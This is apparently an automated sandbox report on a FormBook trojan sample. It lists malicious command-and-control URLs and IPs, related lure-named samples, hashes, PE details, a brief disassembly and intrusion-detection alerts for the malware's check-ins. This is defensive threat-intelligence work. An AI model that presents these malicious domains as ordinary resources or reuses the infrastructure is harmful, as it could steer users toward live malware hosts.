                                                                                  http://www.corverd.store/3nzp/?Sh=PglkqFvbbyb87SegldF7644R50nw13706su3sEKMhHJ419d8UFlSgmN6uEUbiABfJzkrsK6wePLWTRJFKAJP15xlx/rUOqsRMQGimgyXa3wd/uL7sq2sISc=&f6SpQ=_n84nZ4HGtatrue
                                                                                    		unknown
                                                                                    http://www.yourtech-agency.com/99um/true
                                                                                      		unknown

                                                                                      URLs from Memory and Binaries

                                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                      http://www.yosoyemy.com/o1rp?Sh=TBsR9lfncompact.exe, 00000005.00000002.3605554811.0000000004386000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003646000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.zt555.shopXFLTednCZUTqje.exe, 00000006.00000002.3606411027.0000000005578000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://yourtech-agency.com/99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7compact.exe, 00000005.00000002.3605554811.0000000004E84000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000004144000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://duckduckgo.com/chrome_newtabcompact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://duckduckgo.com/ac/?q=compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocompact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.csscompact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://goge8opp.com:301compact.exe, 00000005.00000002.3605554811.000000000483C000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003AFC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.ecosia.org/newtab/compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://ac.ecosia.org/autocomplete?q=compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jscompact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcompact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csscompact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      109.234.166.180
                                                                                                      		yourtech-agency.comFrance
                                                                                                      		50474O2SWITCHFRtrue
                                                                                                      162.0.213.72
                                                                                                      		www.beescy.xyzCanada
                                                                                                      		35893ACPCAtrue
                                                                                                      34.120.137.41
                                                                                                      		connect.hostinger.comUnited States
                                                                                                      		15169GOOGLEUSfalse
                                                                                                      162.209.189.212
                                                                                                      		kloeti.pc205kopl.comUnited States
                                                                                                      		40065CNSERVERSUStrue
                                                                                                      118.99.50.8
                                                                                                      		unknownHong Kong
                                                                                                      		38186FTG-AS-APForewinTelecomGroupLimitedISPatHKtrue
                                                                                                      84.32.84.32
                                                                                                      		ainude2.cloudLithuania
                                                                                                      		33922NTT-LT-ASLTtrue
                                                                                                      104.21.21.230
                                                                                                      		www.personalcaresale.shopUnited States
                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                      3.33.130.190
                                                                                                      		sacidasorte.comUnited States
                                                                                                      		8987AMAZONEXPANSIONGBtrue
                                                                                                      81.88.48.71
                                                                                                      		corverd.storeItaly
                                                                                                      		39729REGISTER-ASITtrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1530786
                                                                                                      Start date and time:2024-10-10 14:44:31 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 8m 37s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Run name:Run with higher sleep bypass
                                                                                                      Number of analysed new started processes analysed:7
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:2
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:NjjLYnPSZr.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@13/9
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 66.7%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 95%
                                                                                                      • Number of executed functions: 14
                                                                                                      • Number of non-executed functions: 329
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target XFLTednCZUTqje.exe, PID 6040 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: NjjLYnPSZr.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      08:46:28API Interceptor7236279x Sleep call for process: compact.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      109.234.166.180Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.yourtech-agency.com/nn8g/
                                                                                                      PRE-ALERT HTHC22031529.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.yourtech-agency.com/nn8g/
                                                                                                      Order 81307529516.LZ.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.yourtech-agency.com/nn8g/
                                                                                                      162.0.213.729b7dlGj5Gq.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.gorilux.top/g86h/
                                                                                                      809768765454654.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      8097600987765.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      Factura de proforma.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      709827261526152615.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      estado de cuenta adjunto.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      z1209627360293827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      709876765465.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/
                                                                                                      700987654656676.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                      • www.hawalaz.xyz/ercr/?eJ=MSINn22QncKT0sdZBWFkPU7MNuE0mk6ZQ+eYCiR8SH8EueCYvtnhwzQH0TyPiANX6bqGZKwq9sS8LmmoRu0oqfwzT9spTf+lbKmfBdOV7DmlkJgPA4izSRs=&zPCT=URo4h
                                                                                                      162.209.189.212e-transac- RP062024 Nominal-PPI2452246 20240712NISPIDJA010O0100000503.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                      • www.66hc7.com/ooz9/
                                                                                                      03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.66hc7.com/ooz9/
                                                                                                      KALIANDRA SETYATAMA_24000000120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.66hc7.com/ooz9/
                                                                                                      118.99.50.8HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                                                                        84.32.84.323qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.anthonyholland.net/rk2p/
                                                                                                        8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.agilizeimob.app/51t8/
                                                                                                        BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.gws-treinamento2.shop/9vaq/
                                                                                                        BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.gundrymd.site/0iqj/
                                                                                                        N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.es-lidl.online/n2dv/
                                                                                                        RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.thepeatear.online/lu5k/?O47=ODXYj9SHKZJf+lLWSD5bWs33an1UuUSGPEbmaLn0QSdqh031jXaTcKLg1x+9N8O9by/Xp7E95P2c73d08b4WEpTb1KZHJdxLaSQTbLs0J3NdMMrdrQ==&LT=aZbPzzPX3H
                                                                                                        8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.thepeatear.online/pt4m/
                                                                                                        Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.pinkpantys.shop/cyro/
                                                                                                        YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.pakmartcentral.shop/ml5l/
                                                                                                        Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.b-ambu.com/a2tr/

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        www.personalcaresale.shopPayrol list.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.67.200.242
                                                                                                        New Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 104.21.21.230
                                                                                                        BL.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.21.230
                                                                                                        payment advice.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.21.230
                                                                                                        MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.67.200.242
                                                                                                        AuT5pFGTFw.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.67.200.242
                                                                                                        new order.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.67.200.242
                                                                                                        HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.21.230
                                                                                                        nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.67.200.242
                                                                                                        DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.67.200.242
                                                                                                        kloeti.pc205kopl.come-transac- RP062024 Nominal-PPI2452246 20240712NISPIDJA010O0100000503.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 162.209.189.212
                                                                                                        03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.209.189.212
                                                                                                        HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.209.189.210
                                                                                                        Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.209.189.210
                                                                                                        KALIANDRA SETYATAMA_24000000120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.209.189.212
                                                                                                        Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.209.189.210
                                                                                                        2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.209.189.211
                                                                                                        www.beescy.xyzSecuriteInfo.com.Win32.RATX-gen.24742.674.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 162.0.213.72
                                                                                                        IIMG_00172424.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        SecuriteInfo.com.Trojan.PackedNET.2966.14355.23143.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        Shipping Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 162.0.213.72
                                                                                                        SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 162.0.213.72
                                                                                                        IMG_00110724.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        O2SWITCHFRhttps://cpanel.benory.digitall-communication.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 109.234.161.150
                                                                                                        https://beydemiron.github.io/instagram/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 109.234.161.80
                                                                                                        https://lunatoic.github.io/Memes/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 109.234.161.80
                                                                                                        mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 109.234.161.213
                                                                                                        po2240134.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 109.234.162.105
                                                                                                        https://itsssl.com/Xwe8BGet hashmaliciousUnknownBrowse
                                                                                                        • 109.234.164.136
                                                                                                        is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
                                                                                                        • 109.234.164.197
                                                                                                        https://github.com/VioletteChiara/AnimalTA/releases/download/v3.2.2/AnimalTA_installer_v3.2.2.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 109.234.160.13
                                                                                                        QOUTATION Print242500065.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                        • 109.234.162.105
                                                                                                        Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 109.234.166.180
                                                                                                        CNSERVERSUSna.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.90.62.142
                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.90.62.142
                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.90.62.142
                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.90.62.142
                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.90.62.142
                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.90.62.142
                                                                                                        9b7dlGj5Gq.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 198.16.50.171
                                                                                                        lPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 23.224.37.78
                                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 23.224.58.152
                                                                                                        NLHiAJgSnj.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.90.62.142
                                                                                                        FTG-AS-APForewinTelecomGroupLimitedISPatHKhttp://guantongfan.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 115.126.78.243
                                                                                                        http://m.a16zcryptocoin.meGet hashmaliciousUnknownBrowse
                                                                                                        • 115.126.113.179
                                                                                                        https://tk009.shop/Get hashmaliciousUnknownBrowse
                                                                                                        • 118.99.50.15
                                                                                                        https://www.tiktok668.shop/Get hashmaliciousUnknownBrowse
                                                                                                        • 118.99.50.15
                                                                                                        https://app1.tk009.shop/Get hashmaliciousUnknownBrowse
                                                                                                        • 118.99.50.15
                                                                                                        https://app.tk009.shop/Get hashmaliciousUnknownBrowse
                                                                                                        • 118.99.50.15
                                                                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 115.126.52.100
                                                                                                        sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 118.99.20.36
                                                                                                        HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 118.99.50.8
                                                                                                        wQsdlAeKOF.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 115.126.52.144
                                                                                                        ACPCAbSgEe4v0It.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 162.48.169.211
                                                                                                        3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.94
                                                                                                        QmBe2eUtqs.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 162.55.60.2
                                                                                                        9b7dlGj5Gq.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 162.0.213.72
                                                                                                        z10RFQ-202401.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 162.55.60.2
                                                                                                        http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                                                                        • 162.55.233.29
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.110.107
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.109.237
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.110.171
                                                                                                        na.elfGet hashmaliciousGafgytBrowse
                                                                                                        • 162.12.60.249

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Temp\s1951-LPl

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\compact.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                        Category:dropped
                                                                                                        Size (bytes):114688
                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):7.9920892518379985
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        File name:NjjLYnPSZr.exe
                                                                                                        File size:283'648 bytes
                                                                                                        MD5:8a6aa375bc5ca6ea45711462189103cb
                                                                                                        SHA1:dfd00591e07f55a69cb29ffdba5af54bd1a4e3ea
                                                                                                        SHA256:2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32
                                                                                                        SHA512:5213242ec7f8426d68f04927f8bc12109c042a1a29b847409475ce36a70c881d9d1b3fbdfa5663d1914f628551394c1346dfa7d43b64feecdbb167cb8ae1b110
                                                                                                        SSDEEP:6144:t8j+I09huqxFTHY2iq1PJh8eDMhzci/HmSdY5SgnTm8MU:RI0mqfzY2iuJaeIJci/BC9iL
                                                                                                        TLSH:6D5422191956954BC0B6BD776C8F7046BF202E173AA32F16DDF69C2AE1680C502AF4CF
                                                                                                        File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L...>Y.W.................P...................`....@................

                                                                                                        File Icon

                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x401590
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x57C6593E [Wed Aug 31 04:12:46 2016 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 00000420h
                                                                                                        push ebx
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        push 000003D8h
                                                                                                        xorps xmm0, xmm0
                                                                                                        lea eax, dword ptr [ebp-00000400h]
                                                                                                        push 00000000h
                                                                                                        push eax
                                                                                                        mov byte ptr [ebp-00000420h], 00000000h
                                                                                                        movq qword ptr [ebp-0000041Fh], xmm0
                                                                                                        movq qword ptr [ebp-00000417h], xmm0
                                                                                                        movq qword ptr [ebp-0000040Fh], xmm0
                                                                                                        mov dword ptr [ebp-00000407h], 00000000h
                                                                                                        mov word ptr [ebp-00000403h], 0000h
                                                                                                        mov byte ptr [ebp-00000401h], 00000000h
                                                                                                        call 00007F8464EA7BCAh
                                                                                                        add esp, 0Ch
                                                                                                        xor ebx, ebx
                                                                                                        mov eax, 00000091h
                                                                                                        mov dword ptr [ebp-04h], 0000666Ch
                                                                                                        mov dword ptr [ebp-28h], 0000292Fh
                                                                                                        mov dword ptr [ebp-24h], 00007995h
                                                                                                        mov dword ptr [ebp-20h], ebx
                                                                                                        mov dword ptr [ebp-18h], ebx
                                                                                                        mov dword ptr [ebp-0Ch], 00001CB2h
                                                                                                        mov dword ptr [ebp-10h], 000000D0h
                                                                                                        mov dword ptr [ebp-14h], 00005835h
                                                                                                        mov dword ptr [ebp-1Ch], 000062FCh
                                                                                                        mov ecx, 000002D0h
                                                                                                        mov edx, 000000FDh
                                                                                                        cmp eax, 000000FDh
                                                                                                        cmovl eax, edx
                                                                                                        dec ecx
                                                                                                        jne 00007F8464EA60C7h
                                                                                                        call 00007F8464EA7E5Fh
                                                                                                        mov dword ptr [ebp-000002ACh], eax
                                                                                                        lea eax, dword ptr [ebp-00000420h]
                                                                                                        push eax
                                                                                                        push 000019A9h

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [C++] VS2012 build 50727
                                                                                                        • [ASM] VS2012 build 50727
                                                                                                        • [LNK] VS2012 build 50727

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x44fd40x45000389dad31162860987280c14d9e7d6a2fFalse0.9890278249547102data7.995793913523369IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-10-10T14:46:06.642558+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497363.33.130.19080TCP
                                                                                                        2024-10-10T14:46:22.302776+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973834.120.137.4180TCP
                                                                                                        2024-10-10T14:46:24.790179+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975434.120.137.4180TCP
                                                                                                        2024-10-10T14:46:27.343329+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976534.120.137.4180TCP
                                                                                                        2024-10-10T14:46:29.886009+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44978334.120.137.4180TCP
                                                                                                        2024-10-10T14:46:35.519675+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498173.33.130.19080TCP
